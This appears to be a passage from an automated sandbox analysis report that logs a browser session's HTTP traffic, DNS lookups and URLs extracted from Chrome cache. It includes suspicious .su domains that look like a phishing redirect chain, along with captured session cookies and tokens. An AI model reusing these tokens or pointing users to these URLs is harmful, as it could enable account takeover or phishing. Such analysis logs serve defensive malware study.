    Source: global trafficHTTP traffic detected: GET /input?key=GOO&key=GOO&action=GET_ID&opid=goo&etid=&domid=1106&ops=apx&google_gid=CAESEKal64efAEdI_g21AVjl3NA&google_cver=1 HTTP/1.1Host: cookie-matching.mediarithmics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /getuid?https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fid=%24UID&ex=appnexus.com&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=yu-uaTSEs_ytshNPAhe9Ql1eAke5p-exDv5p4qQCG6dY4dUQp0klz7F4PL4BCNjM4Xb20OclYTn_2wh3KSbts7i02szQu1mONFLGrWELEvo.; receive-cookie-deprecation=1; uuid2=5668533296459418706; anj=dTM7k!M4/YF7/.XF']wIg2GTwsv^l_!]tbPl1M]o$IyEVU[Vl!U!rJ%:XKS=HMN=@Z/.RhEX4<Tctgr*BQ4<A!_6-zQEVk`!#sF3Q$`QY
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D3525%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=sizmek&id=9e85d7c4-6b7e-43f3-aae7-2ea3d9bc2f05 HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=indexHMT&id=Zr4E20t3ua0AAHMyAbC.vgAA HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /amazon/1/get?_url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dsemasio%26id%3D%24%7BUIPID%28%29%7D HTTP/1.1Host: uipglob.semasio.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26ctb%3D1%26m%3D1%26sc%3DB82A0YC1SM3B4A82DCGS%26pc%3D4285%26at%3D4285%26t%3D1723729112265%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26ui%3D2%26lob%3D1:4285 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY
    Source: global trafficHTTP traffic detected: GET /ecm3?id=91cec23ca7ee0bc606ba790dd842217&ex=freewheel.tv&gdpr=&gdpr_consent=&userId= HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A94x7cOy0E6VmJKhhQVGd4s; ad-privacy=0
    Source: global trafficHTTP traffic detected: GET /images/I/617y0uaih6L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sync_a9/val=xMY_RxLPTLWoJ2HZkRpNQA&redirect=https://aax-eu.amazon-adsystem.com/s/ecm3?ex=bidswitch.com&id=${UUID}&gdpr_consent= HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11ly5CFE1YL.css?AUIClients/AuthXClaimCollectionUIAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: chromecache_284.2.dr, chromecache_506.2.drString found in binary or memory: C=null,G={toolCreation:"SS",ad_unit_type:"Text",ad_unit_description:"SiteStripe Share on Media",destination_type:"1"===p?"ASIN":"Multiple",page_type:"1"===p?"Detail":"Gateway",served_ind:"N"},E={popoverLabel:a.social_share_header_link,header:a.social_share_header_link,activate:"onclick",width:530},z=function(){w.hide();u.hide();L.hide()},H={facebook:{server:"//www.facebook.com",template:"/share.php?u\x3d__FULLURL__"},twitter:{server:"https://twitter.com",template:"/intent/tweet?original_referer\x3d__FULLURL__\x26text\x3d__DESCRIPTION__\x26related\x3d__RELATEDACCOUNTS__\x26url\x3d__SHORTURL__\x26via\x3d__VIA__", equals www.facebook.com (Facebook)
    Source: chromecache_284.2.dr, chromecache_506.2.drString found in binary or memory: C=null,G={toolCreation:"SS",ad_unit_type:"Text",ad_unit_description:"SiteStripe Share on Media",destination_type:"1"===p?"ASIN":"Multiple",page_type:"1"===p?"Detail":"Gateway",served_ind:"N"},E={popoverLabel:a.social_share_header_link,header:a.social_share_header_link,activate:"onclick",width:530},z=function(){w.hide();u.hide();L.hide()},H={facebook:{server:"//www.facebook.com",template:"/share.php?u\x3d__FULLURL__"},twitter:{server:"https://twitter.com",template:"/intent/tweet?original_referer\x3d__FULLURL__\x26text\x3d__DESCRIPTION__\x26related\x3d__RELATEDACCOUNTS__\x26url\x3d__SHORTURL__\x26via\x3d__VIA__", equals www.twitter.com (Twitter)
    Source: chromecache_552.2.dr, chromecache_289.2.drString found in binary or memory: return"".concat(this.shareBaseUrl).concat(d).concat(b)}},fb:{label:"Facebook",name:"facebook",ref:"fa",shareBaseUrl:"https://www.facebook.com/dialog/share",image:"".concat("https://m.media-amazon.com/images/G/01/share-icons/","facebook-circular.svg"),imageSquared:"".concat("https://m.media-amazon.com/images/G/01/share-icons/","facebook-squared.svg"),canOpenInPopup:!0,getSharingUrl:function(b){b=encodeURIComponent(b||a.shareUrl.getReturnForChannel(this.ref));var d=encodeURIComponent(a.shareUrl.getReturnForChannel(this.ref).replace("_r_", equals www.facebook.com (Facebook)
    Source: global trafficDNS traffic detected: DNS query: aeromexico.playable.video
    Source: global trafficDNS traffic detected: DNS query: foxloc.com.br
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: eff.contempi.su
    Source: global trafficDNS traffic detected: DNS query: ygbz.prosolmi.su
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: images-eu.ssl-images-amazon.com
    Source: global trafficDNS traffic detected: DNS query: m.media-amazon.com
    Source: global trafficDNS traffic detected: DNS query: completion.amazon.com
    Source: global trafficDNS traffic detected: DNS query: fls-eu.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: unagi-eu.amazon.com
    Source: global trafficDNS traffic detected: DNS query: unagi.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: completion.amazon.ae
    Source: global trafficDNS traffic detected: DNS query: images-na.ssl-images-amazon.com
    Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: match.360yield.com
    Source: global trafficDNS traffic detected: DNS query: audex.userreport.com
    Source: global trafficDNS traffic detected: DNS query: rd.frontend.weborama.fr
    Source: global trafficDNS traffic detected: DNS query: odr.mookie1.com
    Source: global trafficDNS traffic detected: DNS query: c1.adform.net
    Source: global trafficDNS traffic detected: DNS query: bs.serving-sys.com
    Source: global trafficDNS traffic detected: DNS query: cookie-matching.mediarithmics.com
    Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: tags.bluekai.com
    Source: global trafficDNS traffic detected: DNS query: rtb-csync.smartadserver.com
    Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: pbs.yahoo.com
    Source: global trafficDNS traffic detected: DNS query: lm.serving-sys.com
    Source: global trafficDNS traffic detected: DNS query: capi.connatix.com
    Source: global trafficDNS traffic detected: DNS query: amazon.partners.tremorhub.com
    Source: global trafficDNS traffic detected: DNS query: public-prod-dspcookiematching.dmxleo.com
    Source: global trafficDNS traffic detected: DNS query: ads.stickyadstv.com
    Source: global trafficDNS traffic detected: DNS query: sync.rfp.fout.jp
    Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
    Source: global trafficDNS traffic detected: DNS query: ssum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: uipglob.semasio.net
    Source: global trafficDNS traffic detected: DNS query: beacon.krxd.net
    Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
    Source: global trafficDNS traffic detected: DNS query: match.sharethrough.com
    Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
    Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
    Source: global trafficDNS traffic detected: DNS query: loadus.exelator.com
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
    Source: global trafficDNS traffic detected: DNS query: uipus.semasio.net
    Source: global trafficDNS traffic detected: DNS query: sync.sxp.smartclip.net
    Source: global trafficDNS traffic detected: DNS query: image6.pubmatic.com
    Source: global trafficDNS traffic detected: DNS query: usermatch.krxd.net
    Source: global trafficDNS traffic detected: DNS query: csync.loopme.me
    Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
    Source: global trafficDNS traffic detected: DNS query: crb.kargo.com
    Source: global trafficDNS traffic detected: DNS query: www.amazon.de
    Source: global trafficDNS traffic detected: DNS query: usersync.gumgum.com
    Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
    Source: global trafficDNS traffic detected: DNS query: sync-amazon.ads.yieldmo.com
    Source: global trafficDNS traffic detected: DNS query: static.siege-amazon.com
    Source: global trafficDNS traffic detected: DNS query: unagi-na.amazon.com
    Source: global trafficDNS traffic detected: DNS query: fls-eu.amazon.com
    Source: global trafficDNS traffic detected: DNS query: d1nruqhae353qc.cloudfront.net
    Source: global trafficDNS traffic detected: DNS query: d2h8zr0m6mus4x.cloudfront.net
    Source: unknownHTTP traffic detected: POST /report/v4?s=V2GLsojLfKOOiS6S7euY9RA8VcaiLizOZb4cfohenrEJcVLa45nwo%2FhpYgo9wLYBxNNlmiu2qwdNLwGoDEuIwzbLIZbR2mR762b8%2BE4t3GtpRa4EWiZO4Af0kYtYIA%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 429Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 15 Aug 2024 13:37:53 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V2GLsojLfKOOiS6S7euY9RA8VcaiLizOZb4cfohenrEJcVLa45nwo%2FhpYgo9wLYBxNNlmiu2qwdNLwGoDEuIwzbLIZbR2mR762b8%2BE4t3GtpRa4EWiZO4Af0kYtYIA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 13819Server: cloudflareCF-RAY: 8b3994f5f845430a-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:38:16 GMTContent-Length: 29Connection: closex-amz-rid: Y4VGNJYVSPQ0WHNMZHSZx-amzn-RequestId: eaeeac16-f27a-4952-82b4-de5aabb6bedfVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Thu, 15 Aug 2024 13:38:17 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: 8JKKF6ZK2M7PBHTBCGX9Accept-CH-Lifetime: 86400Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/X-Content-Type-Options: nosniffX-XSS-Protection: 1;Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 81dd58fce895623c177df225d0a65d52.cloudfront.net (CloudFront)X-Amz-Cf-Pop: LHR50-P1Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: MR2VmrpkHntpG_QCiUCEH0Dx2iSl94Oh2l4dyC612DZWB6QcIO7QGQ==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:38:24 GMTContent-Length: 29Connection: closex-amz-rid: H4FF8ZZER1YGA2ESRYV2x-amzn-RequestId: b9349b9e-f8ca-492f-b371-51691bf1a64bVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:38:25 GMTContent-Length: 29Connection: closex-amz-rid: ERR7GVQ8XBBF09RX75W0x-amzn-RequestId: a9f1f3fd-6c4e-4075-b1f9-288be47c0e16Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:38:29 GMTContent-Length: 29Connection: closex-amz-rid: PPWY69VBVBGR8BQACYTRx-amzn-RequestId: 37a30aba-7bf7-4b64-be73-8ebc8881fe33Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Thu, 15 Aug 2024 13:38:34 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: W4T1RWZS68ZPW20X5CYDAccept-CH-Lifetime: 86400content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/X-Content-Type-Options: nosniffX-XSS-Protection: 1;Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 af69af45a94f94ec264bfb9a5a28f3aa.cloudfront.net (CloudFront)X-Amz-Cf-Pop: LHR50-P1Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: bcWaTKAv9ogZJxVB5It6pJ7XdVdLVg0FRfVaVgkoJK9aMz1k-BOdYg==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:38:36 GMTContent-Length: 29Connection: closex-amz-rid: X70QMBFX8NDEDGK2P185x-amzn-RequestId: 8598d1d0-2222-4dbd-98f3-911441279df9Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 15 Aug 2024 13:38:38 GMTContent-Length: 9Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Thu, 15 Aug 2024 13:39:00 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: BWBH5T1NWX6ZM9CYSHWAContent-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionAccept-CH-Lifetime: 86400X-XSS-Protection: 1;X-Content-Type-Options: nosniffStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 59970c86d3717db509a968eaad0da4de.cloudfront.net (CloudFront)X-Amz-Cf-Pop: LHR50-P1Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: fSkKZ2xZW0wasJfEVrZ4z-1NhvpY7VURLc5OKpz_vRzC3xAblr0otA==
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:39:02 GMTContent-Length: 29Connection: closex-amz-rid: GZCSDVJG26KHBQ22J47Hx-amzn-RequestId: 535865c8-34a2-4926-9281-2a5efe712bacVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:39:02 GMTContent-Length: 29Connection: closex-amz-rid: 2AJ7XT049404MDASCY99x-amzn-RequestId: 1d1c7720-1d2c-4e03-82b0-7cd31fd2ff56Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Thu, 15 Aug 2024 13:39:04 GMTContent-Length: 29Connection: closex-amz-rid: 572W2A1GTE699VTCKRHWx-amzn-RequestId: b8bfc40d-9e38-486c-bb53-368db4df950aVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
    Source: chromecache_552.2.dr, chromecache_289.2.drString found in binary or memory: http://amazon.com/
    Source: chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drString found in binary or memory: http://browserhacks.com/#hack-e71d8692f65334173fee715c222cb805
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia
    Source: chromecache_777.2.dr, chromecache_546.2.dr, chromecache_927.2.dr, chromecache_1044.2.drString found in binary or memory: http://jquery.com/
    Source: chromecache_777.2.dr, chromecache_546.2.dr, chromecache_927.2.dr, chromecache_1044.2.drString found in binary or memory: http://jquery.org/license
    Source: chromecache_1014.2.drString found in binary or memory: http://jqueryui.com
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://ocsp.digicert.com0A
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://ocsp.digicert.com0X
    Source: chromecache_362.2.dr, chromecache_723.2.drString found in binary or memory: http://opengraphprotocol.org/schema/
    Source: chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drString found in binary or memory: http://opensource.org/licenses/BSD-3-Clause
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl07
    Source: chromecache_787.2.dr, chromecache_823.2.dr, chromecache_1033.2.dr, chromecache_774.2.drString found in binary or memory: http://pki-ocsp.symauth.com0
    Source: chromecache_1044.2.drString found in binary or memory: http://sizzlejs.com/
    Source: chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drString found in binary or memory: http://tools.ietf.org/html/rfc2397
    Source: chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drString found in binary or memory: http://wiki.whatwg.org/wiki/Crypto
    Source: chromecache_1071.2.dr, chromecache_291.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
    Source: chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/comms.html#crossDocumentMessages
    Source: chromecache_601.2.drString found in binary or memory: https://EfF.contempi.su/DJuy2C6F/#E
    Source: chromecache_646.2.drString found in binary or memory: https://YGBZ.prosolmi.su/bimffjrqdyqqywotmgukxknFrlaLVDISNZJPKCEJEZQVNOEOUAVXEJJJKCJXKDJJA
    Source: chromecache_362.2.drString found in binary or memory: https://aax-eu.amazon.ae/e/xsp/imp?b=RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICB
